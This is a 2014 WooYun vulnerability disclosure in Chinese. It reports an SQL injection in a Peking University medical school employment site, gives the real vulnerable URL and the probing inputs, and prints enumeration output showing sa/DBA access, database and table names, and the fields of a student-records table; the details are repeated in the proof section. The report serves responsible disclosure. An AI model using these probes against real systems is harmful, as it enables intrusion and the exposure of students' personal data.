当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-068053

漏洞标题:北京大学某分站存在SQL注入漏洞,泄露大量学生信息

相关厂商:北京大学

漏洞作者: 浮萍

提交时间:2014-07-10 15:48

修复时间:2014-08-24 15:50

公开时间:2014-08-24 15:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-10: 细节已通知厂商并且等待厂商处理中
2014-07-10: 厂商已经确认,细节仅向厂商公开
2014-07-20: 细节向核心白帽子及相关领域专家公开
2014-07-30: 细节向普通白帽子公开
2014-08-09: 细节向实习白帽子公开
2014-08-24: 细节向公众公开

简要描述:

涉及多站数据库

详细说明:

北京大学分站
北京大学医学部存在SQL注入
http://graschool.bjmu.edu.cn/EmploymentWeb/zxgg.aspx?id=2537

Snap9.jpg


输入"'"报错

Snap11.jpg


and 1=1正常

Snap10.jpg


系统信息

current user:    'sa'
current database: 'EmploymentWeb'
current user is DBA: True
database management system users [3]:
[*] BUILTIN\\Administrators
[*] sa
[*] vice


数据库

available databases [12]:
[*] EmploymentWeb
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] xueweiban
[*] xwbweb
[*] yuanban
[*] zhaoshengban
[*] zsbweb


以zhaoshengban数据库为例
表:

Database: zhaoshengban
[134 tables]
+----------------------------------+
| D204 |
| D205 |
| D208 |
| D209 |
| D210 |
| D211 |
| D212 |
| D213 |
| D214 |
| D215 |
| D216 |
| D218 |
| D225 |
| D226 |
| D227 |
| D307 |
| D309 |
| D328 |
| D348 |
| D_DanWei |
| D_GuoJi |
| D_MinZu |
| D_ShengShi |
| D_XingBie |
| D_Xz |
| D_ZhuanYe |
| D_hyzk |
| D_xjyd |
| D_xtx |
| D_zzmm |
| Danwei |
| Dwxz |
| Lqfs |
| Pylx |
| Rxxbfs |
| Sheet1$ |
| VXueshengxuejilishi |
| Vbiyeshengjiuyelishi |
| Vdoctor_zhaoshengjihua |
| Vmaster_zhaoshengjihua |
| Vxuesheng_xtx |
| Vyongrendanwei |
| Xllb |
| Xszt |
| XueShengXueJi |
| Zhaomin_xueji |
| ?? |
| bas_department |
| bas_filetype |
| bas_gdtype |
| biyesheng_envelopprint |
| biyesheng_jibenxinxi |
| biyesheng_jiuyelishi |
| biyesheng_lishixinxi |
| biyeshengjibenxinxi |
| biyeshenglishixinxi |
| code_directory |
| code_type |
| d_download |
| d_files |
| d_jxj_grade |
| d_jxj_type |
| d_view_baoxian_register |
| d_view_xuesheng_jiangli_check |
| d_view_xuesheng_jiangli_register |
| d_view_xuesheng_pingding |
| d_xj_year |
| doctor_baoming |
| doctor_kaoshichengji |
| doctor_luqu |
| doctor_zhaoshengjihua |
| dtproperties |
| graduate_info |
| graduate_times |
| leAuditCollectAlerts |
| leAuditCollectConfigVars |
| leAuditCollectDatabases |
| leAuditCollectEventData |
| leAuditCollectNotification |
| master_baoming |
| master_kaoshichengji |
| master_luqu |
| master_zhaoshengjihua |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| sys_CodeMatching |
| sys_XueZhi |
| sys_ejdwsz |
| sys_jxj |
| sys_op_rcd |
| sys_table_content |
| sys_table_name |
| sys_user |
| sys_xj_modifycontent |
| sys_xj_modifytime |
| sys_xueshengquanxian |
| sysconstraints |
| syssegments |
| t_1 |
| temp_bs |
| temp_ss |
| v_zhuguan_gangweishenqing |
| xuesheng_baoxian_account |
| xuesheng_baoxian_account |
| xuesheng_baoxian_check_time |
| xuesheng_baoxian_register |
| xuesheng_baoxian_time |
| xuesheng_chuguo |
| xuesheng_jiangli_grade |
| xuesheng_jiangli_grade |
| xuesheng_jiangli_register |
| xuesheng_jianli |
| xuesheng_jxj |
| xuesheng_ruxuechengji |
| xuesheng_shehuiguanxi |
| xuesheng_shijia |
| xuesheng_xjyd_data |
| xuesheng_xjyd_data |
| xuesheng_xtx |
| xuesheng_xuejibiangeng |
| xuesheng_xuejibiangeng |
| xuesheng_xuejilishi |
| xuesheng_zhuce |
| xueshengbiandongqingkuang |
| yongrendanwei |
| yongrendanweixuqiu |
| zhao_to_malin |
| zhuanye |
| zhuguan_gangwei |
| zhuguan_persons |
| zhuguan_shenqing |
+----------------------------------+


其中表XueShengXueJi存放是学生信息
表字段有:

recid,年度,婚否,性别,民族,姓名,国籍,专业,学制,籍贯,备注,学号,准考号,报名号,学生状态,汉语拼音,学生类型,招生类别,出生日期,政治面貌,学历类别,培养类型,出生地点,培养单位,毕业时间,身份证号,学生照片,异动情况,乘车区间,入学日期,研究方向,答辩时间,毕业去向,指导教师,获学位时间,预毕业标记,入学前职务,入学前单位,入学前专业,入学前职称,生源所在地,预毕业时间,硕士毕业学校,入学前毕业系,户口所在省市,会何种外语3,大学毕业学校,硕士修业年限,特殊情况说明,家庭通讯电话,会何种外语1,家庭通讯地址,毕业证书编号,大学毕业专业,家庭通讯邮编,会何种外语2,入学选拔方式,预作计划标记,硕士毕业时间,大学毕业时间,大学修业年限,硕士毕业专业,入学前毕业时间,入学前毕业院校,入学前单位电话,入学前单位邮编,入学前毕业专业,入学前毕业年限,硕士学位论文题目,硕士学位论文时间,领取毕业证书时间,入学前工作学习情况


(sqlmap出来的数据库是乱码,可以dump下来看,是学生的信息)

Database: yuanban
[7 tables]
+----------------+
| admin |
| book |
| d_good_teacher |
| dtproperties |
| sysconstraints |
| syssegments |
| type |
+----------------+


[*] xueweiban
[*] xwbweb
[*] yuanban
[*] zhaoshengban
[*] zsbweb


从命名来看,应该是学位办、招生办

漏洞证明:

北京大学分站
北京大学医学部存在SQL注入
http://graschool.bjmu.edu.cn/EmploymentWeb/zxgg.aspx?id=2537

Snap9.jpg


输入"'"报错

Snap11.jpg


and 1=1正常

Snap10.jpg


系统信息

current user:    'sa'
current database: 'EmploymentWeb'
current user is DBA: True
database management system users [3]:
[*] BUILTIN\\Administrators
[*] sa
[*] vice


数据库

available databases [12]:
[*] EmploymentWeb
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] xueweiban
[*] xwbweb
[*] yuanban
[*] zhaoshengban
[*] zsbweb


以zhaoshengban数据库为例
表:

Database: zhaoshengban
[134 tables]
+----------------------------------+
| D204 |
| D205 |
| D208 |
| D209 |
| D210 |
| D211 |
| D212 |
| D213 |
| D214 |
| D215 |
| D216 |
| D218 |
| D225 |
| D226 |
| D227 |
| D307 |
| D309 |
| D328 |
| D348 |
| D_DanWei |
| D_GuoJi |
| D_MinZu |
| D_ShengShi |
| D_XingBie |
| D_Xz |
| D_ZhuanYe |
| D_hyzk |
| D_xjyd |
| D_xtx |
| D_zzmm |
| Danwei |
| Dwxz |
| Lqfs |
| Pylx |
| Rxxbfs |
| Sheet1$ |
| VXueshengxuejilishi |
| Vbiyeshengjiuyelishi |
| Vdoctor_zhaoshengjihua |
| Vmaster_zhaoshengjihua |
| Vxuesheng_xtx |
| Vyongrendanwei |
| Xllb |
| Xszt |
| XueShengXueJi |
| Zhaomin_xueji |
| ?? |
| bas_department |
| bas_filetype |
| bas_gdtype |
| biyesheng_envelopprint |
| biyesheng_jibenxinxi |
| biyesheng_jiuyelishi |
| biyesheng_lishixinxi |
| biyeshengjibenxinxi |
| biyeshenglishixinxi |
| code_directory |
| code_type |
| d_download |
| d_files |
| d_jxj_grade |
| d_jxj_type |
| d_view_baoxian_register |
| d_view_xuesheng_jiangli_check |
| d_view_xuesheng_jiangli_register |
| d_view_xuesheng_pingding |
| d_xj_year |
| doctor_baoming |
| doctor_kaoshichengji |
| doctor_luqu |
| doctor_zhaoshengjihua |
| dtproperties |
| graduate_info |
| graduate_times |
| leAuditCollectAlerts |
| leAuditCollectConfigVars |
| leAuditCollectDatabases |
| leAuditCollectEventData |
| leAuditCollectNotification |
| master_baoming |
| master_kaoshichengji |
| master_luqu |
| master_zhaoshengjihua |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| sys_CodeMatching |
| sys_XueZhi |
| sys_ejdwsz |
| sys_jxj |
| sys_op_rcd |
| sys_table_content |
| sys_table_name |
| sys_user |
| sys_xj_modifycontent |
| sys_xj_modifytime |
| sys_xueshengquanxian |
| sysconstraints |
| syssegments |
| t_1 |
| temp_bs |
| temp_ss |
| v_zhuguan_gangweishenqing |
| xuesheng_baoxian_account |
| xuesheng_baoxian_account |
| xuesheng_baoxian_check_time |
| xuesheng_baoxian_register |
| xuesheng_baoxian_time |
| xuesheng_chuguo |
| xuesheng_jiangli_grade |
| xuesheng_jiangli_grade |
| xuesheng_jiangli_register |
| xuesheng_jianli |
| xuesheng_jxj |
| xuesheng_ruxuechengji |
| xuesheng_shehuiguanxi |
| xuesheng_shijia |
| xuesheng_xjyd_data |
| xuesheng_xjyd_data |
| xuesheng_xtx |
| xuesheng_xuejibiangeng |
| xuesheng_xuejibiangeng |
| xuesheng_xuejilishi |
| xuesheng_zhuce |
| xueshengbiandongqingkuang |
| yongrendanwei |
| yongrendanweixuqiu |
| zhao_to_malin |
| zhuanye |
| zhuguan_gangwei |
| zhuguan_persons |
| zhuguan_shenqing |
+----------------------------------+


其中表XueShengXueJi存放是学生信息
表字段有:

recid,年度,婚否,性别,民族,姓名,国籍,专业,学制,籍贯,备注,学号,准考号,报名号,学生状态,汉语拼音,学生类型,招生类别,出生日期,政治面貌,学历类别,培养类型,出生地点,培养单位,毕业时间,身份证号,学生照片,异动情况,乘车区间,入学日期,研究方向,答辩时间,毕业去向,指导教师,获学位时间,预毕业标记,入学前职务,入学前单位,入学前专业,入学前职称,生源所在地,预毕业时间,硕士毕业学校,入学前毕业系,户口所在省市,会何种外语3,大学毕业学校,硕士修业年限,特殊情况说明,家庭通讯电话,会何种外语1,家庭通讯地址,毕业证书编号,大学毕业专业,家庭通讯邮编,会何种外语2,入学选拔方式,预作计划标记,硕士毕业时间,大学毕业时间,大学修业年限,硕士毕业专业,入学前毕业时间,入学前毕业院校,入学前单位电话,入学前单位邮编,入学前毕业专业,入学前毕业年限,硕士学位论文题目,硕士学位论文时间,领取毕业证书时间,入学前工作学习情况


yuanban中的表

Database: yuanban
[7 tables]
+----------------+
| admin |
| book |
| d_good_teacher |
| dtproperties |
| sysconstraints |
| syssegments |
| type |
+----------------+


[*] xueweiban
[*] xwbweb
[*] yuanban
[*] zhaoshengban
[*] zsbweb


从命名来看,应该是学位办、招生办

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-07-10 16:35

厂商回复:

已通知相关学校处理

最新状态:

暂无


漏洞评价:

评论